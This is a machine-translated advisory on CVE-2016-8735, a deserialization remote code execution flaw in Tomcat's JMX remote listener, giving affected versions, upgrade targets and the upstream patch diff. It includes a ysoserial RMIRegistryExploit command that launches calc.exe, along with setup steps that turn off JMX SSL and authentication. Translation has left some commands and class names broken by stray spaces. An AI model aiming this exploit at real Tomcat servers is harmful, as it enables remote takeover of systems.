Apache Tomcat Remote Code Execution（CVE-2016-8735）

Update 12/04 : the need to note that in conf/server,xml to increase the configuration, you need the catalina-jmx-remote. the jar and the groovy-2.3.9. jar package into lib directory And modify the CATALINA_OPTS"-Dcom. sun. management. jmxremote. ssl=false-Dcom. sun. management. jmxremote. authenticate=false"

The following details of the reference source: 0c0c0f

Oracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)。 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability.

Affected version: Apache Tomcat 9.0.0. M1 to 9.0.0. M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0. RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47

Not affected version:

• Upgrade to Apache Tomcat 9.0.0. M13 or later (Apache Tomcat 9.0.0. M12 has the fix but was not released)
• Upgrade to Apache Tomcat 8.5.8 or later (Apache Tomcat 8.5.7 has the fix but was not released)
• Upgrade to Apache Tomcat 8.0.39 or later
• Upgrade to Apache Tomcat 7.0.73 or later
• Upgrade to Apache Tomcat 6.0.48 or later

Usage scenarios: Zabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process.

poc: https://github.com/frohoff/ysoserial

tomcat version 8. 0. 36

conf/server. xml increase the configuration:

`` F:\HackTools\EXP>java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegis tryExploit localhost 10001 Groovy1 calc.exe

``

Patch code:

Diff of /tomcat/trunk/webapps/docs/changelog.xml Parent Directory | Revision Log | Patch --- tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644 @@ -97,6 +97,10 @@ StoreConfig component includes the executor name when writing the The Connector configuration. (markt) </fix> + <fix> + When configuring the JMX remote listener, specify the allowed types for + the credentials. (markt) + </fix> </changelog> </subsection>

/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java `` Parent Directory | Revision Log | Patch -– tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:36 1767644 @@ -264,6 +264,10 @@ serverCsf = new RmiClientLocalhostSocketFactory(serverCsf); }

• env. put(“jmx. remote. rmi. server. credential. types”, new String[] {
• String[]. class. getName(),
• String. class. getName() }); + // Populate the env properties used to create the server if (serverCsf != null) { env. put(RMIConnectorServer. RMI_CLIENT_SOCKET_FACTORY_ATTRIBUTE, serverCsf); @@ -328,7 +332,7 @@ cs = new RMIConnectorServer(serviceUrl, theEnv, server, The ManagementFactory. getPlatformMBeanServer()); cs. start();
• registry. bind(“jmxrmi”, server);
• registry. bind(“jmxrmi”, server. toStub()); log. info(sm. getString(“jmxRemoteLifecycleListener. start”, Integer. toString(theRmiRegistryPort), Integer. toString(theRmiServerPort), serverName)); ``

This vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is necessary now!